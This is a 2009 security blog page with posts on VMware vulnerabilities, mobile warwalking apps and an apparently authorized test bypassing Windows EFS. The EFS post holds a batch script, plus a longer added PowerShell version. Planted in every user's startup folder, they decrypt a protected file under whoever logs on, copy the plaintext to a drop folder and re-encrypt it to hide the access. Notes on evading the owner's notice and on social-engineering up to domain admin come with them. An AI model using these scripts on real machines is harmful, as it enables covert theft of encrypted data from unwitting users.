Tuesday, April 7, 2009

VMware VPX Client Patched

The issue with the VMware VPX Client that I reported last summer was finally patched last week. The issue was that after using the VPX Client to authenticate with part of the VMware infrastructure, I observed that a plaintext copy of the username and password remained resident in memory for as long as the client was running. This is an issue because it could be possible for an attacker to use forensic techniques to recover your username and password. The issue was reported as CVE-2009-0518 and can also be found on the VMware website: http://www.vmware.com/security/advisories/VMSA-2009-0005.html

Wednesday, February 25, 2009

Mobile Hacking


My old Palm smartphone finally died this Christmas and I got a new XV6800 smartphone. It comes WiFi enabled and I have found that it is really great for all kinds of wireless fun. I have found that there are plenty of great free Windows Mobile 6 applications for network scanning and analysis. I have found that my phone works really well for searching for wireless access points. It has been really convenient to just turn on the WiFi on my phone and see what is around. I have found tons of open and poorly secured access points at places that I go all the time. My phone has also been especially useful for finding rogue access points at work, because it is way easier to use my phone than to tote a laptop around the building. Using my phone for locating access points is so fun that it almost feels like a high-tech Easter egg hunt. Here is a list of a few apps that I have found for WM6 devices.
Wififofum2 for warwalking.
HandySniffer for packet sniffing.
MobileVT for ssh and other terminals.
vxutil for port scanning, ping sweep, tracert, and many other utils.
EDh for hex memory and file editing.
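The rogue access point hunt described above comes down to comparing what a scan sees against an inventory of radios you actually own. The following is an added example, not code from the original post or from any of the apps listed: it takes a constructed set of scan results in a simple CSV layout (not the export format of Wififofum2 or any other tool) and flags the three things worth walking over to look at: an unknown BSSID advertising the corporate SSID, open networks, and WEP networks. The inventory and the scan data are hypothetical.

```powershell
# Added example (not from the original post): classify Wi-Fi scan results
# against an inventory of authorized access points.

# Hypothetical corporate inventory: BSSID -> expected SSID
$authorized = @{
    '00:11:22:33:44:01' = 'CorpWiFi'
    '00:11:22:33:44:02' = 'CorpWiFi'
}

# CONSTRUCTED scan results (not any tool's real export format)
$scanCsv = @'
BSSID,SSID,Security,Signal
00:11:22:33:44:01,CorpWiFi,WPA2,-45
00:11:22:33:44:02,CorpWiFi,WPA2,-60
00:11:22:33:44:99,CorpWiFi,WPA2,-50
aa:bb:cc:dd:ee:01,linksys,Open,-70
aa:bb:cc:dd:ee:02,HomeNet,WEP,-80
'@

function Classify-AccessPoint {
    param([string]$Bssid, [string]$Ssid, [string]$Security)
    $key = $Bssid.ToLower()
    if ($authorized.ContainsKey($key)) {
        if ($authorized[$key] -eq $Ssid) { return 'authorized' }
        # Our radio, but not the SSID we configured on it: misconfiguration or tampering
        return 'authorized BSSID with unexpected SSID'
    }
    # An unknown radio advertising the corporate SSID is the classic evil twin
    if ($authorized.Values -contains $Ssid) {
        return 'ROGUE (corporate SSID on unknown BSSID)'
    }
    switch ($Security) {
        'Open'  { return 'open network' }
        'WEP'   { return 'weak encryption (WEP)' }
        default { return 'unknown network' }
    }
}

$scanCsv | ConvertFrom-Csv | ForEach-Object {
    '{0}  {1,-10} {2,-5} {3,5}  {4}' -f $_.BSSID, $_.SSID, $_.Security, $_.Signal,
        (Classify-AccessPoint -Bssid $_.BSSID -Ssid $_.SSID -Security $_.Security)
}
```

In a real walk the signal column is what lets you triangulate: the strongest reading for the "ROGUE" row tells you which floor and which corner to check, which is the part the phone makes easy.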

Saturday, January 31, 2009

VMware Delta Disk Issue Fixed

VMware released an advisory yesterday for my delta disk issue. Thanks to VMware for their hard work and cooperation in fixing the issue. Monty Ijzerman and his team were a pleasure to work with. The issue has a very low possibility of being exploited because the attacker would need rights to edit existing VM files or add a new VM. But one viable attack vector would be through the distribution of a corrupt virtual appliance. An attacker could create a VM containing a corrupt delta disk and convince an administrator to load the VM for them. When the corrupt VM is powered on, it will cause the ESX host that it resides on to crash. VMware says that my other issues are expected to be patched in Q1 2009.

Friday, January 23, 2009

Windows EFS

So I have been playing around with Windows EFS lately at work, trying various ways to get access to EFS encrypted files and directories. At work we are implementing a new AD structure and looking into using EFS for encrypting sensitive files from other employees in the office. So my boss set up a test machine that used the new AD structure, placed an EFS encrypted file on there for me, and told me to do whatever it took to get the file. Upon researching EFS I found that there are 4 main ways to decrypt a file: be the owner of the file, crack/steal the file owner's password, become a domain or local recovery agent, or trick the user into decrypting it for you. I was actually prohibited from cracking or stealing any passwords, so that was out of the question. I tried to become a recovery agent and was able to use social engineering techniques to elevate myself to a domain admin and decrypt the files. But I also wanted to use a purely technical approach, so I also found a nice reliable way to gain access to the files. The machines were unlocked and had no BIOS password set, so I came in after hours, booted into BackTrack, and placed the following simple script in the startup directory of all users.

rem Runs at logon as whoever logs in; decrypt only works if that user holds a key for the file
cipher /D /A filename
rem Copy the now-plaintext file out (a copy of a still-encrypted file would stay encrypted)
copy filename \mydir\filename
rem Re-encrypt the original so the owner notices nothing
cipher /E /A filename

So, if possible, the best way to get around EFS is just to have the user decrypt it for you.
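The batch script above works, but it gives no feedback when it runs under an account that does not hold a key for the file, and it blindly re-encrypts. The following is an added example, not the original post's script, that does the same decrypt/copy/re-encrypt step with the checks a practitioner would want: it tests the Encrypted attribute first, reports which account the decrypt succeeded or failed as, always restores the Encrypted attribute, and logs the result. The file and folder paths are hypothetical; it uses the .NET FileInfo.Decrypt()/Encrypt() methods, which call EFS the same way cipher.exe does.

```powershell
# Added example (not from the original post). Dropped in a Startup folder it
# runs as whoever logs on; Decrypt() only succeeds for a user whose EFS key
# can open the file, so the log records which logons actually worked.
param(
    [string]$Target  = 'C:\Share\secret.docx',   # hypothetical EFS-encrypted file
    [string]$DropDir = 'C:\Users\Public\drop'    # hypothetical collection folder
)

function Test-EfsEncrypted {
    param([string]$Path)
    $attrs = (Get-Item -LiteralPath $Path -Force).Attributes
    return [bool]($attrs -band [IO.FileAttributes]::Encrypted)
}

function Copy-EfsPlaintext {
    param([string]$Path, [string]$Destination)
    $file = Get-Item -LiteralPath $Path -Force
    if (-not (Test-EfsEncrypted $Path)) {
        Copy-Item -LiteralPath $Path -Destination $Destination
        return 'copied (file was not encrypted)'
    }
    try {
        $file.Decrypt()        # throws unless this user holds a key for the file
    } catch {
        return "decrypt failed as $env:USERNAME : $($_.Exception.Message)"
    }
    try {
        # Destination folder must not carry the Encrypted attribute, or the
        # copy is re-encrypted on write and we gain nothing
        Copy-Item -LiteralPath $Path -Destination $Destination
        return "copied plaintext as $env:USERNAME"
    } finally {
        $file.Encrypt()        # restore the Encrypted attribute on the original
    }
}

New-Item -ItemType Directory -Path $DropDir -Force | Out-Null
$dest   = Join-Path $DropDir (Split-Path $Target -Leaf)
$result = Copy-EfsPlaintext -Path $Target -Destination $dest
"$(Get-Date -Format s) $env:USERNAME $Target : $result" |
    Add-Content -LiteralPath (Join-Path $DropDir 'log.txt')
```

Two caveats worth knowing before relying on this: the re-encrypted original carries only the current user's certificate (plus any recovery agent), so a file that had been shared with several EFS users loses the other entries, and both Decrypt() and the cipher.exe equivalent are EFS operations the owner can see in the file's encryption details, which is why the social engineering route in the post is the quieter one.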